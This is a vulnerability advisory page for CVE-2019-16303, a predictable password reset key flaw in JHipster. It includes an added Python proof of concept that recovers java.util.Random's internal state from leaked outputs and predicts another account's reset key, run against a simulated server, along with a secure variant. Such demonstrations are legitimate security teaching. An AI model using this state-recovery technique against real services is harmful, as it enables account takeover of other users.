CVE-2019-16303
CRITICAL
JHipster <6.3.0 & JHipster Kotlin <=1.1.0 - Privilege Escalation
A class generated by the Generator in JHipster before 6.3.0 and JHipster Kotlin through 1.1.0 builds password reset keys from an insecure source of randomness (org.apache.commons.lang3.RandomStringUtils, which draws from a shared java.util.Random instance). An attacker who can obtain their own password reset URL can recover the generator's state from it and compute the reset keys issued for all other accounts, allowing account takeover and privilege escalation.
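The weakness behind this entry, as an added worked example that is not part of the original advisory or of the JHipster code base: a Python model of the 48-bit linear congruential generator inside java.util.Random (the generator RandomStringUtils draws from), followed by the standard recovery of the full generator state from a few consecutive outputs and a prediction of the next key. The names JavaRandom, weak_token, recover_state, attack_demo and secure_token are illustrative and assumed. weak_token is a simplified stand-in for randomAlphanumeric that draws one nextInt(62) per character rather than reproducing the library's rejection-sampling loop, the raw leaked outputs stand in for the attacker's own reset key, and the seed and scenario are constructed.

```python
import secrets
import string

# Constants of java.util.Random's LCG (same values as the JDK).
MULT = 0x5DEECE66D
ADD = 0xB
MASK = (1 << 48) - 1
ALPHABET = string.ascii_letters + string.digits  # 62 characters


class JavaRandom:
    """Python model of java.util.Random: 48 bits of state, next(bits) returns the top bits."""

    def __init__(self, seed):
        # Random(long seed) scrambles the seed with the multiplier before use.
        self.state = (seed ^ MULT) & MASK

    @classmethod
    def from_state(cls, state):
        """Build a generator positioned at a known internal state (what the attacker recovers)."""
        rng = cls.__new__(cls)
        rng.state = state & MASK
        return rng

    def next_bits(self, bits):
        self.state = (self.state * MULT + ADD) & MASK
        return self.state >> (48 - bits)

    def next_int(self, bound=None):
        """nextInt() returns a signed 32-bit value; nextInt(bound) follows the JDK algorithm."""
        if bound is None:
            value = self.next_bits(32)
            return value - (1 << 32) if value >= (1 << 31) else value
        if bound & (bound - 1) == 0:  # power of two: take the high bits
            return (bound * self.next_bits(31)) >> 31
        while True:  # rejection loop that avoids modulo bias
            bits = self.next_bits(31)
            value = bits % bound
            if bits - value + (bound - 1) < (1 << 31):
                return value


def weak_token(rng, length=20):
    """Simplified stand-in for RandomStringUtils.randomAlphanumeric (assumption: one
    nextInt(62) per character; the library samples a wider range with rejection).
    What matters is that every call draws from the same shared java.util.Random."""
    return "".join(ALPHABET[rng.next_int(62)] for _ in range(length))


def recover_state(outputs):
    """Recover the internal state from >= 2 consecutive nextInt() outputs.
    The first output exposes the top 32 of the 48 state bits; the remaining 16 bits are
    brute-forced (65536 candidates) and each candidate is checked against the later outputs.
    Returns the state after the last observed output, i.e. ready to predict what comes next."""
    top = outputs[0] & 0xFFFFFFFF
    for low in range(1 << 16):
        state = (top << 16) | low
        for expected in outputs[1:]:
            state = (state * MULT + ADD) & MASK
            if (state >> 16) != (expected & 0xFFFFFFFF):
                break
        else:
            return state
    return None


def attack_demo(seed=42, length=20):
    """Constructed scenario: a server keeps one shared weak generator for all reset keys.
    The attacker observes a few outputs (standing in for their own reset key), recovers the
    state, and predicts the key issued to the next victim. Returns (victim_key, predicted_key)."""
    server = JavaRandom(seed)
    leaked = [server.next_int() for _ in range(3)]  # seen by the attacker
    victim_key = weak_token(server, length)         # issued to another account

    attacker = JavaRandom.from_state(recover_state(leaked))
    return victim_key, weak_token(attacker, length)


def secure_token(length=20):
    """Hardened form: draw from the OS CSPRNG (secrets), the analogue of passing a
    java.security.SecureRandom into RandomStringUtils.random(...) as the 6.3.0 fix does."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


if __name__ == "__main__":
    victim, guess = attack_demo()
    print("victim key    :", victim)
    print("attacker guess:", guess, "(match)" if victim == guess else "(miss)")
    print("secure key    :", secure_token())
```

The multiplier, increment and 48-bit mask are the JDK's own, so JavaRandom(42).next_int() reproduces new Random(42).nextInt(). The search space never exceeds 2^48 regardless of how the outputs are mapped to characters, which is why a SecureRandom-backed generator, not a longer key, is the fix.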
References (8)
Third Party Advisory x_refsource_misc
https://github.com/jhipster/generator-jhipster/security/advisories/GHSA-mwp6-j9wf-968c
Exploit, Issue Tracking, Third Party Advisory x_refsource_misc
https://github.com/jhipster/generator-jhipster/issues/10401
Patch, Third Party Advisory x_refsource_misc
https://github.com/jhipster/generator-jhipster/commit/88448b85fd3e8e49df103f0061359037c2c68ea7
Exploit, Issue Tracking, Third Party Advisory x_refsource_misc
https://github.com/jhipster/jhipster-kotlin/issues/183
Release Notes, Vendor Advisory x_refsource_misc
https://www.jhipster.tech/2019/09/13/jhipster-release-6.3.0.html
Mailing List x_refsource_mlist
https://lists.apache.org/thread.html/r6d243e7e3f25daeb242dacf3def411fba32a9388d3ff84918cb28ddd%40%3Cissues.commons.apache.org%3E
Mailing List x_refsource_mlist
https://lists.apache.org/thread.html/rc87fa35a48b5d70b06af6fb81785ed82e82686eb83307aae6d250dc9%40%3Cissues.commons.apache.org%3E
Mailing List x_refsource_mlist
https://lists.apache.org/thread.html/rc3f00f5d3d2ec0e2381a3b9096d5f5b4d46ec1587ee7e251a3dbb897%40%3Cissues.commons.apache.org%3E
Scores
CVSS v3
9.8
EPSS
0.0367
EPSS Percentile
88.2%
Attack Vector
NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Details
CWE
CWE-338
Status
published
Products (3)
jhipster/jhipster
< 6.3.0
jhipster/jhipster_kotlin
<= 1.1.0
npm/generator-jhipster-kotlin
0 - 1.2.0
Published
Sep 14, 2019
Tracked Since
Feb 18, 2026